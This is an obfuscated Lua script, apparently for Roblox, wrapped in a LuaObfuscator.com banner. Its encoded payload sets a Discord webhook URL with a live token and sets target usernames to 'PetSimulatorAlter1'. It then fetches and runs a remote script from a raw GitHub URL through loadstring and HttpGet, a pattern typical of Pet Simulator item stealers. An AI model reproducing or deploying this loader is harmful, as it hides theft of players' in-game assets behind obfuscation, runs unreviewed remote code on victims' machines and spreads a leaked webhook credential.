--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0 -0 ;local v32;while true do if (v31==(2 -1)) then return v32;end if (v31==(0 -0)) then v32=v1(v16,v19,v19);v19=v19 + 1 ;v31=2 -1 ;end end end v23=nil;function v23()local v33,v34=v1(v16,v19,v19 + (621 -(555 + 64)) );v19=v19 + (933 -(857 + 74)) ;return (v34 * (824 -(367 + 201))) + v33 ;end v18=3;end if (v18==4) then function v25()local v35=v24();local v36=v24();local v37=928 -(214 + 713) ;local v38=(v21(v36,1 + 0 ,4 + 16 ) * (((1059 -(67 + 113)) -(282 + 595))^(1669 -(1117 + 406 + 114)))) + v35 ;local v39=v21(v36,19 + 2 ,43 -12 );local v40=((v21(v36,1097 -(68 + 997) )==(1271 -(226 + 1044))) and  -1) or 1 ;if (v39==(0 -0)) then if (v38==(117 -(32 + 85))) then return v40 * 0 ;else v39=1 + 0 ;v37=0 + 0 ;end elseif (v39==2047) then return ((v38==(957 -((2189 -1297) + 65))) and (v40 * ((2 -1)/(0 -0)))) or (v40 * NaN) ;end return v8(v40,v39-((1381 + 496) -854) ) * (v37 + (v38/((352 -((345 -258) + 263))^52))) ;end v26=nil;function v26(v41)local v42;if  not v41 then v41=v24();if (v41==(952 -(802 + 150))) then return "";end end v42=v3(v16,v19,(v19 + v41) -(2 -1) );v19=v19 + v41 ;local v43={};for v67=1 -0 , #v42 do v43[v67]=v2(v1(v3(v42,v67,v67)));end return v6(v43);end v18=5;end if (v18==6) then v29=nil;function v29()local v44=603 -(268 + 335) ;local v45;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v44==(1 + 0)) then v47=nil;v48=nil;v44=2;end if (v44==2) then v49=nil;v50=nil;v44=257 -(163 + 91) ;end if (v44==(575 -(426 + 146))) then v51=nil;while true do local v76=0 + 0 ;while true do if (v76~=(1456 -(282 + 1174))) then else if (v45~=(1933 -(1869 + 61))) then else local v100=0 + 0 ;while true do if ((0 -0)~=v100) then else for v105=1,v24() do v47[v105-(1 -0) ]=v29();end return v49;end end end if (v45==(0 -0)) then local v101=0;local v102;while true do if (v101~=(0 + 0)) then else v102=1024 -(706 + 318) ;while true do if (v102~=(1252 -(721 + 530))) then else v48={};v45=1 -0 ;break;end if (v102==(1271 -(945 + 326))) then v46={};v47={};v102=1;end end break;end end end v76=1;end if (v76==(2 -1)) then if (v45==(2 + 0)) then local v103=1474 -(1329 + 145) ;while true do if (v103==(972 -(140 + 831))) then for v107=1851 -(1409 + 441) ,v24() do local v108=718 -(15 + 703) ;local v109;local v110;while true do if (v108==0) then v109=0;v110=nil;v108=1 + 0 ;end if (1~=v108) then else while true do if (v109==(438 -(262 + 176))) then v110=v22();if (v21(v110,1722 -(345 + 1376) ,689 -(198 + 490) )~=(0 -0)) then else local v170=0 + 0 ;local v171;local v172;local v173;local v174;while true do if (v170==(0 -0)) then local v177=1206 -(696 + 510) ;while true do if (v177~=(1086 -(461 + 625))) then else v171=0 -0 ;v172=nil;v177=1263 -(1091 + 171) ;end if (v177~=(1 + 0)) then else v170=1;break;end end end if (v170==(1172 -(418 + 753))) then local v178=0 -0 ;while true do if (v178~=(0 -0)) then else v173=nil;v174=nil;v178=1;end if (v178==1) then v170=376 -(123 + 251) ;break;end end end if (v170==(1 + 1)) then while true do if (v171==(0 -0)) then local v181=0;while true do if (v181==1) then v171=699 -(208 + 490) ;break;end if (v181==(0 + 0)) then local v191=0;while true do if ((1 + 0)==v191) then v181=837 -(660 + 176) ;break;end if ((0 + 0)==v191) then v172=v21(v110,1324 -(1249 + 73) ,1 + 2 );v173=v21(v110,206 -(14 + 188) ,681 -(534 + 141) );v191=1 + 0 ;end end end end end if ((1148 -(466 + 679))==v171) then if (v21(v173,6 -3 ,3 + 0 )~=(1 + 0)) then else v174[4]=v51[v174[8 -4 ]];end v46[v107]=v174;break;end if (v171==(1902 -(106 + 1794))) then if (v21(v173,1,1)==1) then v174[2]=v51[v174[2]];end if (v21(v173,2 -0 ,5 -3 )~=(1 + 0)) then else v174[3]=v51[v174[2 + 1 ]];end v171=399 -(115 + 281) ;end if (v171~=1) then else local v183=0 -0 ;while true do if (v183==(0 -0)) then v174={v23(),v23(),nil,nil};if (v172==(0 -0)) then local v192=1427 -(41 + 1386) ;while true do if (v192~=(867 -(550 + 317))) then else v174[3 + 0 ]=v23();v174[4]=v23();break;end end elseif (v172==1) then v174[3 -0 ]=v24();elseif (v172==(3 -1)) then v174[8 -5 ]=v24() -(2^(22 -6)) ;elseif (v172~=3) then else local v197=0 -0 ;local v198;while true do if (v197~=0) then else v198=0 -0 ;while true do if (v198==0) then v174[3]=v24() -((287 -(134 + 151))^16) ;v174[1669 -(970 + 695) ]=v23();break;end end break;end end end v183=1 + 0 ;end if (v183==1) then v171=3 -1 ;break;end end end end break;end end end break;end end break;end end end v45=5 -2 ;break;end if (0==v103) then for v111=1991 -(582 + 1408) ,v50 do local v112=0 + 0 ;local v113;local v114;local v115;local v116;local v117;while true do if (v112~=(0 -0)) then else v113=0 -0 ;v114=nil;v112=3 -2 ;end if (v112==(1825 -(1195 + 629))) then v115=nil;v116=nil;v112=2;end if (v112==2) then v117=nil;while true do if (v113==(0 -0)) then local v167=241 -(187 + 54) ;while true do if (0~=v167) then else v114=780 -(162 + 618) ;v115=nil;v167=1 + 0 ;end if (v167~=1) then else v113=3 -2 ;break;end end end if (2==v113) then while true do if (v114==(0 + 0)) then local v175=1212 -(323 + 889) ;local v176;while true do if (v175~=0) then else v176=0 -0 ;while true do if (v176==0) then local v184=0 -0 ;while true do if (0~=v184) then else v115=0 -0 ;v116=nil;v184=321 -(53 + 267) ;end if (v184==(1 + 0)) then v176=1 + 0 ;break;end end end if (1==v176) then v114=1637 -(1373 + 263) ;break;end end break;end end end if (v114~=(983 -(18 + 964))) then else v117=nil;while true do if (v115~=(1001 -(451 + 549))) then else if (v116==(1 + 0)) then v117=v22()~=(0 -0) ;elseif (v116==2) then v117=v25();elseif (v116==(4 -1)) then v117=v26();end v51[v111]=v117;break;end if ((1384 -(746 + 638))==v115) then local v180=850 -(20 + 830) ;while true do if (v180==(0 + 0)) then v116=v22();v117=nil;v180=1 -0 ;end if (v180==(342 -(218 + 123))) then v115=1582 -(1535 + 46) ;break;end end end end break;end end break;end if (v113~=1) then else v116=nil;v117=nil;v113=2 + 0 ;end end break;end end end v49[6 -3 ]=v22();v103=1 + 0 ;end end end if (v45==(1 + 0)) then v49={v46,v47,nil,v48};v50=v24();v51={};v45=3 -1 ;end break;end end end break;end if (v44==(1467 -(899 + 568))) then v45=0 + 0 ;v46=nil;v44=2 -1 ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v52)if (v1(v52,2)==79) then v20=v0(v3(v52,1,1));return "";else local v69=v2(v0(v52,16));if v20 then local v77=v5(v69,v20);v20=nil;return v77;else return v69;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v53,v54,v55,v56=v1(v16,v19,v19 + (1554 -((2247 -(118 + 1003)) + (1243 -818))) );v19=v19 + (409 -(118 + 287)) ;return (v56 * 16777216) + (v55 * (256854 -191318)) + (v54 * 256) + v53 ;end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=0;local v61;local v62;local v63;while true do if (v60==0) then v61=v57[1];v62=v57[2];v60=1;end if (v60==1) then v63=v57[3];return function(...)local v78=v61;local v79=v62;local v80=v63;local v81=v28;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do local v93=0;while true do if (v93==0) then v90=v78[v82];v91=v90[1];v93=1;end if (v93==1) then if (v91<=5) then if (v91<=2) then if (v91<=0) then v88[v90[2]]=v59[v90[3]];elseif (v91==1) then local v126=v90[2];local v127=v88[v90[3]];v88[v126 + 1 ]=v127;v88[v126]=v127[v90[4]];else v88[v90[2]][v90[3]]=v90[4];end elseif (v91<=3) then local v120=v90[2];local v121,v122=v81(v88[v120](v13(v88,v120 + 1 ,v90[3])));v83=(v122 + v120) -1 ;local v123=0;for v124=v120,v83 do local v125=0;while true do if (v125==0) then v123=v123 + 1 ;v88[v124]=v121[v123];break;end end end elseif (v91>4) then v88[v90[2]]=v90[3]~=0 ;else local v134;local v135,v136;local v137;local v138;v88[v90[2]][v90[3]]=v90[4];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v59[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v59[v90[3]];v82=v82 + 1 ;v90=v78[v82];v138=v90[2];v137=v88[v90[3]];v88[v138 + 1 ]=v137;v88[v138]=v137[v90[4]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3]~=0 ;v82=v82 + 1 ;v90=v78[v82];v138=v90[2];v135,v136=v81(v88[v138](v13(v88,v138 + 1 ,v90[3])));v83=(v136 + v138) -1 ;v134=0;for v161=v138,v83 do v134=v134 + 1 ;v88[v161]=v135[v134];end v82=v82 + 1 ;v90=v78[v82];v138=v90[2];v88[v138]=v88[v138](v13(v88,v138 + 1 ,v83));v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]();v82=v82 + 1 ;v90=v78[v82];v82=v90[3];end elseif (v91<=8) then if (v91<=6) then v88[v90[2]]();elseif (v91==7) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end else v88[v90[2]][v90[3]]=v90[4];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v59[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]][v90[3]]=v90[4];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v82=v90[3];end elseif (v91<=10) then if (v91==9) then local v156=0;local v157;while true do if (v156==0) then v157=v90[2];v88[v157]=v88[v157](v13(v88,v157 + 1 ,v83));break;end end else do return;end end elseif (v91==11) then v82=v90[3];else v88[v90[2]]=v90[3];end v82=v82 + 1 ;break;end end end end;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v64,v65,v66)if v66 then local v70=(817 -440) -(142 + 235) ;local v71;while true do if (v70==0) then v71=(v64/(2^(v65-(4 -3))))%((1 + 1)^(((v66-(978 -((1540 -987) + 424))) -(v65-(1 -0))) + 1)) ;return v71-(v71%(1 + 0)) ;end end else local v72=(2 + 0)^(v65-(1 + 0)) ;return (((v64%(v72 + v72))>=v72) and (1 + 0)) or (0 + 0) ;end end v22=nil;v18=2;end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130393334393836383933393531373938322F4A2O647A4757675A693277322O3964522O78314647514342445F644F6D3244437A4C3858684541477077704E597939446C7A73496E3363423570617A626658366A757359030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585363726970742F6D61696E2F4C7970686572585363726970745A03083O00557365724E616D6503123O0050657453696D756C61746F72416C7465723103093O00557365724E616D653200173O00120C3O00013O0026073O000E0001000200040B3O000E000100122O000100033O00300400010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026073O00010001000100040B3O0001000100122O000100033O0030080001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O000A3O00017O00",v9(),...);end
